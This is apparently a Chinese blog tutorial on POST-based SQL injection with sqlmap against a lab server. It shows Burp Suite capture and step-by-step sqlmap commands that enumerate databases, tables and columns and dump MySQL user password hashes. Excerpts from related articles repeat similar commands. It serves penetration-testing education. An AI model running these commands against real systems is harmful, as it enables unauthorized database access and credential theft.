利用sqlmap进行POST注入

使用sqlmap进行POST注入实战指南
最新推荐文章于 2025-10-16 17:01:19 发布
原创 最新推荐文章于 2025-10-16 17:01:19 发布 · 1.6w 阅读 · 35 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #mysql

本文介绍了如何利用sqlmap工具进行POST注入攻击。首先,讲解了sqlmap的基本概念和POST注入产生的原因,接着说明实验目的——熟悉sqlmap命令。实验环境中,使用CentOS服务器。实验步骤包括:通过Burp Suite抓包,使用sqlmap列数据库、猜表、猜列,最终获取root用户的密码哈希值。
部署运行你感兴趣的模型镜像

目录

预备知识

了解Sqlmap

sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。

POST注入形成的原因

POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下:
在这里插入图片描述

实验目的

通过该实验熟悉sqlmap常用的命令,完成POST注入攻击。

实验环境

在这里插入图片描述
服务器:CentOS,IP地址:10.1.1.136
测试者:win7,IP地址随机

实验步骤一

使用sqlmap进行POST注入

1.打开http://10.1.1.136,输入用户名:admin,密码:password,登录:
在这里插入图片描述
2.选择Brute Force选项,username和password随便输入(此处我输入admin和123456),然后打开burpsuite,设置好本地代理(忘记的同学可看实验一),进行抓包:
在这里插入图片描述
在这里插入图片描述
3.将抓到的包保存为1.txt,并放到c盘根目录下。
列数据库,输入命令:

sqlmap.py -r c:\1.txt -p username --dbs

注:-r表示加载一个文件,-p指定参数。
在这里插入图片描述

实验步骤二

4.选择一个数据库,比如选mysql,猜表,输入命令:

sqlmap.py -r c:\1.txt-p username -D mysql --tables

在这里插入图片描述
5.猜列,输入命令:

sqlmap.py -r c:\1.txt-p username -D mysql -T user --columns

在这里插入图片描述
6.猜数据,输入命令:

sqlmap.py -r c:\1.txt -p username -D mysql -T user -C “User,Password” --dump

在这里插入图片描述
7.此时就得到了root用户的密码哈希值,接下来解密就行。

您可能感兴趣的与本文相关的镜像

ComfyUI

ComfyUI

AI应用
ComfyUI

ComfyUI是一款易于上手的工作流设计工具,具有以下特点:基于工作流节点设计,可视化工作流搭建,快速切换工作流,对显存占用小,速度快,支持多种插件,如ADetailer、Controlnet和AnimateDIFF等

sqlmap执行POST注入的两种方式
渗透之路,攻防之间皆学问
07-08 2万+
我们都知道在web中进行数据传参用的最多的就是GET型或者POST型方法,所以根据此我们也可以把注入分为GET型注入POST注入 GET型:http://192.168.80.146/2_Shotting_Range/sql/Less-1/?id=1 通过在可见的URL中进行传参 POST型:与数据库交互是通过post数据进行,url不可见 post注入例子 有两种方法,一种是-r的方式,另一种是--data 1. sqlmap -r 如下获取到post的数据,在我们可能认为存在注..
SQLMAP基础使用 -r (GET或POST)
Z_l123的博客
02-18 4486
1.访问SQLi-Labs网站 访问Less-4 http://192.168.5.116/sqli-labs/Less-4/ 2.利用Burpsuite工具抓包 1)启动Burpsuite并设置代理服务端口 2)设置Firefox代理 注意:端口要一致 3)开启 Burpsuite的代理拦截功能 4)利用Burpsuite工具拦截HTTP请求包 在Firefox地址栏中给定一个GET参数,并访问 http://192.168.5.116/sqli-labs/Less..
SQLMAP-POST注入
热门推荐
大博的博客
08-17 1万+
BUGKU-ctf作为国内著名的ctf联系靶场,拥有丰富的题型加强我们的ctf水平。下面就是一次我认为比较典型的sql post注入题型。 抓包,复制出来打成一个txt文件 sqlmap -r test.txt -p admin_name –dbs 因为博主懒的没有在win环境下下载sqlmap,使用kali中自带sqlmap工具。下面简单解释一下工具命令。 ![]https://ss...
sqlmap工具
zxgt5y的博客
02-24 905
sqlmap工具基础
渗透测试—手把手教你sqlmap数据库注入测试—靶场实战教程建议收藏!
最新发布
wholeliubei的博客
10-16 703
SQLMap是一款自动化SQL注入工具,支持5种注入模式(布尔盲注、时间盲注、报错注入、联合查询和堆叠查询),可检测和利用网站SQL注入漏洞。它支持主流数据库如MySQL、Oracle等,通过简单命令即可扫描目标网站、获取数据库信息(库名、表名、字段等)。安装需Python3环境,使用时可通过代理参数配合BurpSuite抓包分析。该工具既能用于渗透测试,也能帮助开发者发现自身系统漏洞,是网络安全领域的重要工具。
Sqlmap -- POST注入
Web安全工具库
07-07 3706
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
利用sqlmap进行POST注入 脱库 提权 数据库
2301_77902563的博客
05-06 1339
sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 它看起来像后端DBMS是'MySQL'。 是否要跳过特定于其他DBMS的测试负载? [Y/n] 输入"Y"for
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 2081
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 5713
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
针对POST型表单注入sqlmap验证的三种参数
weixin_44023403的博客
04-12 7041
针对POST型表单注入sqlmap验证的三种参数一、知识储备二、验证漏洞的三种参数1:--data2:-r3:--forms 一、知识储备 针对post型的表单,sqlmap有三种参数可验证: –data 需要自己手工找到参数名以及一些信息 -r 需要自己抓包 –forms sqlmap中的自动抓包获取参数,最方便 二、验证漏洞的三种参数 这里借助sqli-labs靶场的less11,来针对post表单注入,用sqlmap进行验证; 首先打开less11; 提交任意数据,用burp抓包; 记下p
记一次使用sqlmap进行post注入
xiongshivigor的博客
08-04 566
记一次使用sqlmap进行post注入 首先用Burp抓到post包,保存到sqlmap目录下,我命名为post.txt 使用sqlmap工具进行探测是否存在注入点。可以看到存在时间盲注,下面就可以用sqlmap爆出相关信息。 探测注入sqlmap.py -r post.txt 爆数据库名 sqlmap.py -r post.txt -dbs 爆表名 sqlmap.py -r post.txt -D web19 --tables 爆列名 sqlmap.py -r post.txt -D web19
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 1567
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 4260
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 3358
使用sqlmap进行post注入学习笔记
sqlmappost注入
Galaxy_fan的博客
08-22 738
数据库 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --dbs 表 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --tables 数据 (users:表名) python sqlmap.py -r D:\GXY\python\sqlmap\test.txt -T users ...
sqlmap使用教程(包含POST注入方式)
weixin_73904941的博客
10-25 1万+
检测注入点以及可注入类型 sqlmap -u "网址" --batch -–batch(不再询问,默认执行) 查看所有数据库 --dbs sqlmap -u "网址" --batch --dbs 查看当前使用的数据库 --current-db sqlmap -u "网址" --batch --current-db 查看表名 sqlmap -u "网址" -D security --tables --batch -D 指定数据库 --tables 列举所有表名 ....
sqlmap的使用之post
2402_88765125的博客
04-09 1850
如需进一步优化(如绕过WAF),可添加 --tamper 脚本(如 space2hash.py )。- 参数冲突:若不同方法结果不一致,优先使用BurpSuite抓包(方法2)确保准确性。- 高级参数:可结合 --cookie 、 --proxy 等应对复杂场景。--level/--risk :提高检测深度和风险等级以覆盖更多场景。--data :POST请求体,需替换为实际参数名和测试值。--forms :自动识别并测试表单字段。-p :指定测试的参数名(可选)。--batch :跳过交互提示。
SQLMapPOST请求注入
2302_80252080的博客
09-15 921
SQL注入Web安全高危漏洞,POST注入因数据不可见性需特殊处理。本文对比GET/POST注入特性,提供SQLMap常用命令速查表,重点介绍三种POST注入实战方法:BurpSuite抓包+文件读取(准确性高)、自动表单检测(便捷快速)、直接指定POST数据。包含高级技巧(batch模式、延迟设置、代理调试)和WAF绕过建议(tamper混淆、随机UA)。强调测试必须获得授权,未经授权属违法行为。
利用sqlmap扫描POST注入
12-31
### 使用 sqlmap 工具进行 POST 注入漏洞扫描 为了使用 `sqlmap` 对基于 POST 请求的应用程序进行 SQL 注入测试,可以通过指定请求文件的方式来实现。具体操作方法如下: 对于需要通过 POST 方法提交表单数据的情况,先准备好包含 HTTP 请求头以及 POST 数据的文本文件(例如命名为 `request.txt`),该文件的内容应模拟浏览器发送给服务器的实际请求。 假设有一个登录页面接受两个字段:“username” 和 “password”。那么准备好的 `request.txt` 文件可能看起来像这样[^5]: ``` POST /login.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 32 username=test&password=test ``` 接着运行带有 `-r` 参数的命令来加载这个保存了完整HTTP请求的消息体文件,并让 `sqlmap` 自动检测是否存在SQL注入的可能性并尝试进一步利用它。完整的命令行指令可能是这样的: ```bash sqlmap -r request.txt --batch ``` 如果希望更精确地控制哪些部分作为潜在可注入点,则可以在上述基础上增加额外选项如 `--data` 来显式指明要测试的具体参数[^1]。 另外,在某些情况下还需要提供认证凭证以便能够访问受保护资源。这时可以借助于 `--auth-cred` 及其他相关联的身份验证配置项完成身份验证过程[^3]。 最后提醒一点,执行任何类型的渗透测试之前都应当获得目标系统的合法授权许可,非法入侵他人计算机信息系统属于违法行为!
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值